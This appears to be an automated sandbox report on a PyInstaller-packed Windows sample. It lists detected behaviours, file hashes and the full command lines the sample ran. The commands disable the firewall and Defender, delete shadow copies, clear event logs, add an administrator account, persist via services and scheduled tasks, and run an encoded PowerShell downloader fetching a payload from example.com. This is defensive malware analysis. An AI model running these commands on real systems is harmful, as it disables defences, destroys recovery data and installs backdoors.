Analysis Overview
SHA256
11e9d14bbff708d791c36da8ba71aa4eda882b56a85cd439cfbe98bf700cd9d3
Threat Level: Likely malicious
The file QueQtcK18.exe was found to be: Likely malicious.
Malicious Activity Summary
Clears Windows event logs
Grants admin privileges
Creates new service(s)
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Drops file in System32 directory
Launches sc.exe
Detects Pyinstaller
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
Permission Groups Discovery: Local Groups
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Runs net.exe
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-03 15:32
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-03 15:32
Reported
2025-05-03 15:34
Platform
win10v2004-20250502-en
Max time kernel
53s
Max time network
55s
Command Line
Signatures
Clears Windows event logs
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
Grants admin privileges
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Permission Groups Discovery: Local Groups
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\ping.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\ping.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe
"C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"
C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe
"C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"
C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /tn MyPythonScript /tr "\"C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe\" \"C:\Users\Admin\AppData\Local\Temp\_MEI8122\QueQtcK18.py\"" /sc onstart /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-NetFirewallProfile -Enabled False"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "sc create OneLogon18 binPath= "C:\Windows\System32\svchost.exe" start= auto"
C:\Windows\system32\sc.exe
sc create OneLogon18 binPath= "C:\Windows\System32\svchost.exe" start= auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "sc start OneLogon18"
C:\Windows\system32\sc.exe
sc start OneLogon18
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "sc create MaliciousService binPath= "C:\Windows\System32\svchost.exe" start= auto"
C:\Windows\system32\sc.exe
sc create MaliciousService binPath= "C:\Windows\System32\svchost.exe" start= auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "sc start MaliciousService"
C:\Windows\system32\sc.exe
sc start MaliciousService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "wevtutil cl Application"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "wevtutil cl System"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "wevtutil cl Security"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "sc create MalwareService binPath= "powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==" start= auto"
C:\Windows\system32\sc.exe
sc create MalwareService binPath= "powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==" start= auto
C:\Windows\system32\wevtutil.exe
"C:\Windows\system32\wevtutil.exe" cl Application
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "sc start MalwareService"
C:\Windows\system32\wevtutil.exe
"C:\Windows\system32\wevtutil.exe" cl System
C:\Windows\system32\wevtutil.exe
"C:\Windows\system32\wevtutil.exe" cl Security
C:\Windows\system32\sc.exe
sc start MalwareService
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "schtasks /create /tn \"MaliciousTask\" /tr \"cmd.exe /c calc\" /sc daily /st 00:00"
C:\Windows\SYSTEM32\ping.exe
ping malicious-host.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-NetFirewallProfile -Enabled False"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "net user OneLogonFintUser password1234 /add"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "net localgroup Administrators OneLogonFintUser /add"
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" user OneLogonFintUser password1234 /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user OneLogonFintUser password1234 /add
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators OneLogonFintUser /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators OneLogonFintUser /add
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn MaliciousTask /tr "cmd.exe /c calc" /sc daily /st 00:00
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | malicious-host.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI8122\python313.dll
| MD5 | 7387fe038ea75eb9a57b054fccfe37bf |
| SHA1 | 5c532cbdfd718b5e80afb2ee8dea991e84757712 |
| SHA256 | 69fd86ea29370697c203f7e12830084f920f490766a8e3045af52c036a9ad529 |
| SHA512 | c46c982b04079ed0b13617b81168598632d6c58d29e23fcbfa064b08e5836866b74880e1a9c01c12670531f13521a21177aafb10be0abb329a79291d7bff08bd |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\VCRUNTIME140.dll
| MD5 | 32da96115c9d783a0769312c0482a62d |
| SHA1 | 2ea840a5faa87a2fe8d7e5cb4367f2418077d66b |
| SHA256 | 052ad6a20d375957e82aa6a3c441ea548d89be0981516ca7eb306e063d5027f4 |
| SHA512 | 616c78b4a24761d4640ae2377b873f7779322ef7bc26f8de7da0d880b227c577ed6f5ed794fc733468477b2fcdb7916def250e5dc63e79257616f99768419087 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\base_library.zip
| MD5 | c8908f8b995911d4fa3d8d5182b68c77 |
| SHA1 | 33410826118610a65a535701cf6ca548a33e8d4f |
| SHA256 | cd1bd1b1795fa06d01e54be54ce5f12d0c7f8795254e79bbe49f5d071d53d254 |
| SHA512 | e0dd014e07fe26e740f14f8be6a4acb30e782207f68d097bb30fb1a8f67dffa3997826184555fb90160be8fa6243741639ef6d14b46256a6dcd449af34db5695 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\_ctypes.pyd
| MD5 | 29873384e13b0a78ee9857604161514b |
| SHA1 | 110f60f74b06b3972acd5908937a40e078636479 |
| SHA256 | 5c0d5082fba1a2a3eb8d5e23073be25164c19f21304b09cecaab340dc7198815 |
| SHA512 | ca826ff5403700e6d8822634e364e43b14ef829095d8fe365b49731236f696fe86ffa3853cd1801dc3b7800d005a032fe23bbc25befe3952ef37790d56dee3c5 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\_socket.pyd
| MD5 | 566cb4d39b700c19dbd7175bd4f2b649 |
| SHA1 | bede896259b6d52d538c2182aef87c334fc9c73c |
| SHA256 | bced17d6f081d81ea7cd92f1e071e38f8840e61ee0fe1524221b776bcfa78650 |
| SHA512 | 6a26fd59e2c2ec34b673ef257a00d5577f52286d78525d05efc8a88760fb575be65c3e94e83396f4978c8734b513afe7f09d3c49474169144f98add406530367 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\_bz2.pyd
| MD5 | 684d656aada9f7d74f5a5bdcf16d0edb |
| SHA1 | f7586da90d101b5ee3fa24f131ee93ab89606919 |
| SHA256 | 449058efc99fccb9e24d640084d845c78f3f86dd34c5c126cf69e523d6320d75 |
| SHA512 | 27fb2eca382675316fb96d18a1aa6b2792077481bf899cbcc658d71f787876045c05c98abf129c9670b6a1d2654d57f59e17580139fa7f482ec27234e44d4235 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\_lzma.pyd
| MD5 | d63e2e743ea103626d33b3c1d882f419 |
| SHA1 | af8a162b43f99b943d1c87c9a9e8088816263373 |
| SHA256 | 48f16b587c6faa44a9e073365b19599200b0f0a0ccb70121e76c2dac4ed53281 |
| SHA512 | d3f1450b5def3c21f47c5133073e76d2ec05787eb6ae88bb70d3a34be84f6025540ac017e9415bb22ef36c2ffbfcea38a28842eefe366325f3d3cf2cca1a3cb1 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\_hashlib.pyd
| MD5 | 3e540ef568215561590df215801b0f59 |
| SHA1 | 3b6db31a97115c10c33266cce8ff80463763c7e6 |
| SHA256 | 52f29aebe9886e830dedc363cd64eb53b6830d84b26e14f1b6faa655a0900b5d |
| SHA512 | 21497a4d1d999a420ed0e146544f4149c72ad4aca4b869a0ee83267d92afa07609ece76a4e95ec706a21580d6544146d0a58c0baa01aa2c242474a4816108527 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\_decimal.pyd
| MD5 | 21fcb8e3d4310346a5dc1a216e7e23ca |
| SHA1 | aab11aef9075715733e0fcde9668c6a51654b9e1 |
| SHA256 | 4e27c06b84401039d10f800a0f06446b58508784ee366c7c8324d8fe9794e1a5 |
| SHA512 | c064550d1723e92512a42ce367ecef9331a81121305d66199abce6e0977152d927f7223f475e22c67e3f64b0f612c5553f112d8ce653c666a98d1980d200a599 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\unicodedata.pyd
| MD5 | 503b3ffa6a5bf45ab34d6d74352f206b |
| SHA1 | cc13b85281e5d52413784e0b65a61b1d037c60cc |
| SHA256 | 071494856fdad0042964769aa2fb1de4ea95c2cfcbe27cc7132293c68d13d710 |
| SHA512 | d20b860974161caa60a62268968af353ad8063589f57d71f57c91855eb83da78f40bae7aa745cc7a945d92ebe08cf244c9560ae93449de45b20a8b8fff9f5010 |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\select.pyd
| MD5 | 715a098175d3ca1c1da2dc5756b31860 |
| SHA1 | 6b3ec06d679c48bfe4391535a822b58a02d79026 |
| SHA256 | 6393121130a3e85d0f6562948024d8614c4c144b84ab102af711c638344d1599 |
| SHA512 | e92edb98427f594badec592493469d45deab3b71e4598d544d0b9a1acffd5327a19c09029fb79d70971cb0ed0dba56056bef8455534d3f16ec35eac723062f3c |
C:\Users\Admin\AppData\Local\Temp\_MEI8122\libcrypto-3.dll
| MD5 | ae5b2e9a3410839b31938f24b6fc5cd8 |
| SHA1 | 9f9a14efc15c904f408a0d364d55a144427e4949 |
| SHA256 | ccfffddcd3defb8d899026298af9af43bc186130f8483d77e97c93233d5f27d7 |
| SHA512 | 36ea760a7b56ea74174882155eddfb8726828240fcfc6b34d90ecdb7e50a7e632374dcbc9b2889081c0973cc51f50967e7d692498c4abd1f2cba3f7fe8d659cc |
memory/2708-32-0x00007FFD1CC33000-0x00007FFD1CC35000-memory.dmp
memory/2708-38-0x000001C218DE0000-0x000001C218E02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_etxojzvw.wfe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2708-43-0x00007FFD1CC30000-0x00007FFD1D6F1000-memory.dmp
memory/2708-44-0x00007FFD1CC30000-0x00007FFD1D6F1000-memory.dmp
memory/2708-45-0x000001C230F50000-0x000001C230F5E000-memory.dmp
memory/2708-46-0x000001C230F80000-0x000001C230F9A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f08bb5e6f49788531694ac01cd9df894 |
| SHA1 | 81edea4b2997856fedc7e27efa12837926c3924b |
| SHA256 | 24cb30bab5b03b374a25961abc5bb1f150be147e0922095997d761a9923e6606 |
| SHA512 | 2ab3d93f6a49bb67408e9f981742becd964338db13c54d6281318b383230d94d814a71bdb7a00c72c6233170ef4a9332a4e1aa633db44f21dfdcbb7578d31717 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b4c38c85d25f548e6bd2d16b79177c13 |
| SHA1 | 7e22f257ab42981633783d1a8088b8837472a86f |
| SHA256 | feae36b7f9aeec516032dde1ffecf764622247dce7596d23449525887c52d532 |
| SHA512 | dd74eab8d4b141921dfdcbbbb1a6df40c62c7aaa22b63d96bf9db4f3e851a635c77011b0c008b66daf277d93aea6a8678eff6bb939e83f3588e4b63d91ac1454 |
C:\temp\malicious_files\malicious_file_4.txt
| MD5 | 36c27a04d9c0cda5d1452f91570d96d8 |
| SHA1 | 715dcb03713dc380e3e35387ccd2ad9138e6cdbf |
| SHA256 | 4a93ff4f6f5c2689e0e299ccd4f1df5e9b5bed90b79b7cf9c3d048d48664b439 |
| SHA512 | 111c383637e37c865d2f21e829d11b44a723eb131155fcee8cbaadd8b2cffe35c3cb90ac60f6107158518831f1d84f8da166fabe45891b5bbe459f65c31a0235 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 46f70064042d4347f3408c31a877c4f5 |
| SHA1 | 064ae10b4fc2318ea9666a2d6004f3836d0dad8d |
| SHA256 | e0fbe1727af5d6db4096e8c8a48b7c8ccb4865551c19522baa75fbf3cf95b29d |
| SHA512 | 24882f6d5bc757b1893c0c1d82307df92e07e8bd2d4ab08ccd404c99abb2f308c42e8004f70fb895f8d109e9dbc890ccbbf7a5059f8d70ee6f1787aad8473ade |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b8f5272f1a630c61556ae3d396dc0a9a |
| SHA1 | 0fc3e0db215cdc31b8fb96caa989196916ee16eb |
| SHA256 | ef48366dbf9c8815c000644531758f59d72258dc8aabbbc2531265948e4656e2 |
| SHA512 | 07019777583138794ba2936e893e76acebba19841d41127da9ee6737843d385db1183639f468f5a582126cd325b7731afd230dfe55cbdcde31f8de26aa6c3be7 |
memory/2708-1104-0x00007FFD1CC30000-0x00007FFD1D6F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a236b3d32301a8a69eb1facaee013c2c |
| SHA1 | e2797d2111ad7f584b538af1e8483c789b42c049 |
| SHA256 | d539da2916ee368cf9ad8455f0e3705300fd9fa5f30e78b3c6e8f7821e778b22 |
| SHA512 | c92ac75c33e501f4c95046e46175788574e2b4d159cb1158b8102d9f4c6b7e269e7df2fca4f43d60a68a35fbcd7b5e3b68ba44839320e5f801d9285ac83568a5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 534b7ac514f09b0ddb01d2c941131956 |
| SHA1 | 8b981b197a789efd757fc7c964e8d7c151327138 |
| SHA256 | ee5bdd4f5ff596a1dfec7e7abf31bed719b357d7f4eac10943b28ec5695a54f3 |
| SHA512 | 38067e3c8ec2231160a53f80b1398ff0c16edff6e3dc20dbb8b9082dc836958ddee08e06734287a6c5f2f537572bee69e9c7324a83a823791da596589467446e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a10f29bd142d27667e3de4927bca93a2 |
| SHA1 | f009910db810d3826add6fdbc5d2d06d30ab200d |
| SHA256 | 6e37cf30b9188d04d5c2e5b9583a1cda02da6c86d4bd03c34c5cc80e6e8642f2 |
| SHA512 | e2c93a19888bd000e9ad79a43ede8e77493a56db21ed19d385e2cd6e6da9d3edf34e5a83c49467d28d7a7ee89d90cdb30a2cc1c6dfd9b22d68c8bb356e8f79fa |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f5a3c413511d951793530df77a555858 |
| SHA1 | dc964e9ca86626b19b8047ab7a0af53d17a22f50 |
| SHA256 | 19664a8c1db4cd0215b35b6ca3983edb1e6e29b1f1720738d59fccb70c20cc56 |
| SHA512 | 61d9fb66854c1e506ece46ea79ec0bbba2caddb0a996f310ee1475877ce967e198ef453b0a0760d76ff4c67438db5f67c6ee18873f90f23f3926847ce8aba059 |